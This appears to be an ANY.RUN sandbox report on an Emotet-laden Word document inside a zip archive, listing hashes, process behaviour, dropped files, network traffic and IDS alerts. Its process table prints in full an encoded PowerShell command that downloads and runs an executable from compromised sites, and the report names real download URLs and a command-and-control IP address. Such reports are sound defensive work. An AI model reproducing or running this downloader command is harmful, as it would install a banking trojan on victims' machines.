analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

File-PYA075_(84066).zip

Full analysis: https://app.any.run/tasks/37f175dc-0db1-469d-b96b-39cbe4abb4c4
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 20, 2020, 00:10:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
emotet
emotet-doc
Indicators:
MIME: application/zip
File info: Zip archive data, at least v5.1 to extract
MD5:

D76819447441E02B60FED0C0B8A0A43A

SHA1:

829988442D33B540830AB536CA91ECD907AD9377

SHA256:

13644020A65AFB6E935357C8E3847F8CBCE9D0A99A8C031E9CDC32ED35270765

SSDEEP:

1536:GlFe+RIqMANwckOtlXhJ9EgtSX2Q+Nj/5fXZuXmaCI1ZDNG0Ae:KrIWNf7FE2Qel/ZuWRw9sS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • FXSEXT32.exe (PID: 2976)
      • Zb5uvjb.exe (PID: 3056)
    • Connects to CnC server

      • FXSEXT32.exe (PID: 2976)
    • EMOTET was detected

      • FXSEXT32.exe (PID: 2976)
    • Changes the autorun value in the registry

      • FXSEXT32.exe (PID: 2976)
  • SUSPICIOUS

    • Creates files in the user directory

      • POwersheLL.exe (PID: 3704)
    • Executed via WMI

      • POwersheLL.exe (PID: 3704)
      • Zb5uvjb.exe (PID: 3056)
    • PowerShell script executed

      • POwersheLL.exe (PID: 3704)
    • Executable content was dropped or overwritten

      • POwersheLL.exe (PID: 3704)
      • Zb5uvjb.exe (PID: 3056)
    • Starts itself from another location

      • Zb5uvjb.exe (PID: 3056)
    • Reads Internet Cache Settings

      • FXSEXT32.exe (PID: 2976)
    • Connects to server without host name

      • FXSEXT32.exe (PID: 2976)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2336)
    • Manual execution by user

      • WINWORD.EXE (PID: 2336)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2336)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 51
ZipBitFlag: 0x0003
ZipCompression: Unknown (99)
ZipModifyDate: 2020:10:19 21:08:00
ZipCRC: 0x5a1f1c74
ZipCompressedSize: 79666
ZipUncompressedSize: 161089
ZipFileName: File-PYA075.doc
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
5
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winrar.exe no specs winword.exe no specs powershell.exe zb5uvjb.exe #EMOTET fxsext32.exe

Process information

PID
CMD
Path
Indicators
Parent process
3060"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\File-PYA075_(84066).zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
2336"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\File-PYA075.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3704POwersheLL -ENCOD IABTAEUAVAAtAHYAQQByAGkAQQBCAGwAZQAgACgAIgAyADYAIgArACIAOABKAHUAIgArACIANAAiACkAIAAgACgAIAAgAFsAdABZAFAAZQBdACgAJwBTAHkAJwArACcAcwBUACcAKwAnAGUAJwArACcATQAnACsAJwAuAEkATwAuAEQAaQBSAEUAYwB0ACcAKwAnAG8AcgBZACcAKQAgACAAKQAgADsAIAAgACAAJABwAEMAcQA4ADUAcwAgAD0AIAAgAFsAdABZAHAARQBdACgAJwBTAHkAcwBUAEUATQAuAE4AZQB0AC4AcwBlAFIAVgAnACsAJwBpAGMAZQAnACsAJwBQAG8AJwArACcAaQBuACcAKwAnAFQAJwArACcAbQBhAE4AYQAnACsAJwBHAEUAcgAnACkAIAAgADsAIABzAGUAVAAtAEkAVABlAE0AIAAgACgAIgBWAEEAcgBpAEEAYgBMACIAKwAiAEUAOgA5ACIAKwAiAEkAIgArACIAZAB4ACIAKwAiADMAIgApACAAKAAgACAAWwB0AFkAUABlAF0AKAAnAHMAWQAnACsAJwBTAHQAZQBNACcAKwAnAC4ATgBlAHQALgAnACsAJwBzAEUAYwBVAFIAaQBUAFkAcAAnACsAJwByAG8AdAAnACsAJwBvAGMAbwAnACsAJwBsAHQAJwArACcAeQBwAEUAJwApACAAIAApACAAOwAgACQATABzAHoAbwBhAGoAbAA9ACgAJwBNAGEAJwArACcANgBhAGgAMQAnACsAJwB5ACcAKQA7ACQATwB4AG8ANwBkADAAZwA9ACQAVABoAGcAdQBuAGQAcwAgACsAIABbAGMAaABhAHIAXQAoADgAMAAgAC0AIAAzADgAKQAgACsAIAAkAEkAMABnAHAAMAA2AGYAOwAkAEwAZABxAHYAawA0AHUAPQAoACcAUQAnACsAJwB0AHYAcQB4ADAAJwArACcAMAAnACkAOwAgACgAIABWAGEAcgBJAGEAQgBsAGUAIAAoACIAMgA2ACIAKwAiADgASgB1ACIAKwAiADQAIgApACkALgB2AEEATAB1AGUAOgA6AGMAcgBFAEEAVABFAGQAaQByAGUAYwBUAE8AUgBZACgAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQAgACsAIAAoACgAJwB2ACcAKwAnAFIAYQBOACcAKwAnADkAMABjACcAKwAnAHEAcgAnACsAJwBfACcAKwAnAHYAUgBhAFcAagAnACsAJwA2AGEAJwArACcAZAA2AGgAdgBSAGEAJwApACAALQBjAFIARQBQAEwAYQBDAEUAIAAgACcAdgBSAGEAJwAsAFsAYwBoAEEAcgBdADkAMgApACkAOwAkAFAAcABqADcAeQB4ADkAPQAoACcAWgAnACsAJwBkAGMAYwBjADgAcgAnACkAOwAgACAAKAAgAGcAQwBJACAAIAB2AGEAcgBJAEEAYgBsAGUAOgBwAEMAUQA4ADUAcwAgACAAKQAuAHYAQQBMAHUAZQA6ADoAUwBFAGMAVQByAEkAdABZAHAAUgBvAFQAbwBjAE8ATAAgAD0AIAAgACgAIAAgAHYAQQByAEkAYQBiAGwARQAgACgAIgA5AGkAIgArACIARABYADMAIgApACAAIAAtAHYAQQBMAHUAZQAgACAAKQA6ADoAVABMAHMAMQAyADsAJABXAGYAdgBkAGsAYwBlAD0AKAAnAFIAOQAnACsAJwA5ADYAcwBjADAAJwApADsAJABCAGwAZABiAHkANQA3ACAAPQAgACgAJwBaACcAKwAnAGIANQAnACsAJwB1AHYAagBiACcAKQA7ACQARABjAHYAaAAxAHIAZwA9ACgAJwBCADAAJwArACcAdQBzAG8ANgA3ACcAKQA7ACQASABrAGkAMgAxAGQANwA9ACgAJwBEACcAKwAnAHoAYwBiAGQAOQBiACcAKQA7ACQASwAwADIAMQBzAG0AZgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwBEAGcAQgBOADkAMABjACcAKwAnAHEAJwArACcAcgBfAEQAZwAnACsAJwBCAFcAJwArACcAagAnACsAJwA2AGEAZAA2AGgARAAnACsAJwBnACcAKwAnAEIAJwApAC0AcgBlAHAAbABhAEMARQAgACAAJwBEAGcAQgAnACwAWwBDAGgAYQByAF0AOQAyACkAKwAkAEIAbABkAGIAeQA1ADcAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwAkAEMAMwAwAGgAcwA5AGoAPQAoACcAVABpACcAKwAnADQAdAAnACsAJwBzAHIAXwAnACkAOwAkAFQAcgBfAGkAMAA1AHUAPQBuAGAARQBXAC0AbwBgAEIAagBgAGUAYwB0ACAAbgBlAHQALgB3AEUAYgBDAGwASQBFAE4AVAA7ACQAUgB3AHEAMgAxAGQAawA9ACgAJwBoAHQAdABwADoALwAnACsAJwAvAGcAdQBhAHIAYQBuAHkAJwArACcALgBuAGUAJwArACcAdAAvACcAKwAnAHoAZQAnACsAJwBmAGkAcgBvACcAKwAnAC8ASwAnACsAJwAvACcAKwAnACoAaAB0AHQAJwArACcAcAA6AC8ALwB3ACcAKwAnAHcAdwAuAHkAYQBuACcAKwAnAGwAaQBwACcAKwAnAGkAbgAuACcAKwAnAG4AJwArACcAZQB0ACcAKwAnAC8AdwBwACcAKwAnAC0AYQBkAG0AJwArACcAaQBuACcAKwAnAC8AUQAnACsAJwAvACoAaAAnACsAJwB0ACcAKwAnAHQAcABzADoALwAvAGEAYQBuACcAKwAnAHMAaAB0AHIAYQB2AGUAbABzAC4AYwBvACcAKwAnAG0ALwBfAG4AbwB0AGUAcwAvAEoATABNACcAKwAnAC8AKgBoAHQAdAAnACsAJwBwAHMAOgAnACsAJwAvAC8AdABjAGEAbQBlAHgAJwArACcAcABvAC4AYwBvACcAKwAnAG0ALwB3ACcAKwAnAHAALQBjACcAKwAnAG8AbgAnACsAJwB0AGUAJwArACcAbgB0AC8AYwAvACoAJwArACcAaAB0AHQAcABzACcAKwAnADoAJwArACcALwAvACcAKwAnAGUAJwArACcAYQBzAGkAJwArACcAaAAnACsAJwBhAGMAJwArACcAawBzAC4AYwBvAG0ALwB3ACcAKwAnAHAAJwArACcALQAnACsAJwBpAG4AYwBsAHUAZABlAHMALwBkAC8AKgBoAHQAdABwAHMAOgAvAC8AYwBvACcAKwAnAHMAeQAnACsAJwBzACcAKwAnAGgAZQAuAGMAbwBtACcAKwAnAC8AJwArACcAdwBwACcAKwAnAC0AaQBuAGMAbAB1AGQAZQAnACsAJwBzACcAKwAnAC8AQQAnACsAJwA0ADEALwAqACcAKwAnAGgAJwArACcAdAB0ACcAKwAnAHAAcwA6AC8ALwAnACsAJwBnAG8AbwAnACsAJwBkAHAAcgBpAGMAZQAnACsAJwBzAGgAJwArACcAbwAnACsAJwBlAHMALgBjAG8AJwArACcAbQAvAHcAcAAtAGkAJwArACcAbgBjAGwAJwArACcAdQBkAGUAcwAvACcAKwAnADAASwBvAC8AJwApAC4AcwBQAEwAaQBUACgAJABEAGwAaQBsAGIAbABjACAAKwAgACQATwB4AG8ANwBkADAAZwAgACsAIAAkAEYAeQBjAGEAcABmAHcAKQA7ACQAWQAwAG8AdwA3AHoAYQA9ACgAJwBBAGIAYQAnACsAJwBzAGsAbQAnACsAJwBwACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARwBtAGkAbwB5AHYAdwAgAGkAbgAgACQAUgB3AHEAMgAxAGQAawApAHsAdAByAHkAewAkAFQAcgBfAGkAMAA1AHUALgBkAG8AdwBOAGwAbwBBAEQAZgBJAGwARQAoACQARwBtAGkAbwB5AHYAdwAsACAAJABLADAAMgAxAHMAbQBmACkAOwAkAFMAOQA4ADQAegAxAHUAPQAoACcAUwA4AF8ANQAnACsAJwA3AGkAMwAnACkAOwBJAGYAIAAoACgAZwBFAHQAYAAtAGkAVABgAGUATQAgACQASwAwADIAMQBzAG0AZgApAC4ATABFAE4ARwB0AGgAIAAtAGcAZQAgADMAMwAyADgANgApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAnAHcAJwArACcAaQAnACsAJwBuADMAMgBfAFAAcgBvACcAKwAnAGMAZQBzAHMAJwApACkALgBjAHIAZQBBAHQARQAoACQASwAwADIAMQBzAG0AZgApADsAJABTAHcAdQBkAG8AagByAD0AKAAnAFcAJwArACcAawBhAGwAJwArACcAdgAzADcAJwApADsAYgByAGUAYQBrADsAJABKAGwAcwBqADUAcABoAD0AKAAnAE8AOAAnACsAJwBfAHoAJwArACcAaABzADQAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABLADcAdgAyADcAdgBsAD0AKAAnAEwAcwAnACsAJwA1AHEAdQAnACsAJwBzAGUAJwApAA== C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3056C:\Users\admin\N90cqr_\Wj6ad6h\Zb5uvjb.exeC:\Users\admin\N90cqr_\Wj6ad6h\Zb5uvjb.exe
wmiprvse.exe
User:
admin
Company:
T
Integrity Level:
MEDIUM
Description:
TODO: <File descri
Exit code:
0
Version:
1.0.0.1
2976"C:\Users\admin\AppData\Local\hcproviders\FXSEXT32.exe"C:\Users\admin\AppData\Local\hcproviders\FXSEXT32.exe
Zb5uvjb.exe
User:
admin
Company:
T
Integrity Level:
MEDIUM
Description:
TODO: <File descri
Version:
1.0.0.1
Total events
2 396
Read events
1 474
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
3
Text files
2
Unknown types
4

Dropped files

PID
Process
Filename
Type
2336WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRBC2C.tmp.cvr
MD5:
SHA256:
3704POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P1BL9P68OXJ4493305KS.temp
MD5:
SHA256:
3704POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF17c9f7.TMPbinary
MD5:B8D28A0751A092388652CF6B1F64DABE
SHA256:BFC8F6304F913269DA5A5B86F1EA87E55AB280927CDDDF355A74454F563FAD89
3704POwersheLL.exeC:\Users\admin\N90cqr_\Wj6ad6h\Zb5uvjb.exeexecutable
MD5:CBB2894C61C083643804BB5281EFD9C8
SHA256:B4BEB7C450C6150F3B8941DF5720DDE6D1C269C97F654A2A5C93E2185854C96B
3060WinRAR.exeC:\Users\admin\Desktop\File-PYA075.docdocument
MD5:1FF834F449DE21B5D21273A8BBDADF06
SHA256:A5562DC1D98DA4EA0F833E5D1AD078FE3E243E0AFACD05B216C4890C328D9505
2336WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\File-PYA075.doc.LNKlnk
MD5:A872C1CD07546CC7A8C598538AE5D8D2
SHA256:6B8307A54AB2B6BE4EFBC3379E1C79E3340D9FC1368B51361324836301D2B887
2336WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:6BD8F93AEFE549570CC4BF7AB8FA3225
SHA256:90110EEC5BC18FC476A35118D280C15923549B92B1B325FD88D1063EAD5C6AD9
2336WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:45D4B63628BF8B9D4D5BD831E7363F04
SHA256:184208224833233BD2C92EF5B0977CE79395796A8E15ACBF88F8F96F8B062BC8
2336WINWORD.EXEC:\Users\admin\Desktop\~$le-PYA075.docpgc
MD5:964F52E2A1E2A847712214F07FCC8F55
SHA256:340958D54361FC429B34D8E8B78AE5A6C51DBF9F550CFC1DA2EC87981737FCE5
2336WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:BAE8DE6825ECCC1C7809F930AED83157
SHA256:8183D50B4FF82CC5EB0EC3B47AF9D4819E02582CC4C968F0393E5A16DBD0B09E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3704
POwersheLL.exe
GET
200
182.92.169.15:80
http://www.yanlipin.net/wp-admin/Q/
CN
executable
504 Kb
suspicious
2976
FXSEXT32.exe
POST
200
186.189.249.2:80
http://186.189.249.2/82YoaOiAxMSTTr3/TsUZhg/Sm7W3cW/MVTLDxrujmTuDB/RDwimEom/AOArRmkniiu5NS/
AR
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
186.189.249.2:80
AR
malicious
3704
POwersheLL.exe
177.12.163.114:80
guarany.net
IPV6 Internet Ltda
BR
suspicious
3704
POwersheLL.exe
182.92.169.15:80
www.yanlipin.net
Hangzhou Alibaba Advertising Co.,Ltd.
CN
suspicious

DNS requests

Domain
IP
Reputation
guarany.net
  • 177.12.163.114
suspicious
www.yanlipin.net
  • 182.92.169.15
suspicious

Threats

PID
Process
Class
Message
3704
POwersheLL.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3704
POwersheLL.exe
A Network Trojan was detected
AV INFO Suspicious EXE download from WordPress folder
3704
POwersheLL.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3704
POwersheLL.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2976
FXSEXT32.exe
A Network Trojan was detected
MALWARE [PTsecurity] Emotet
1 ETPRO signatures available at the full report
No debug info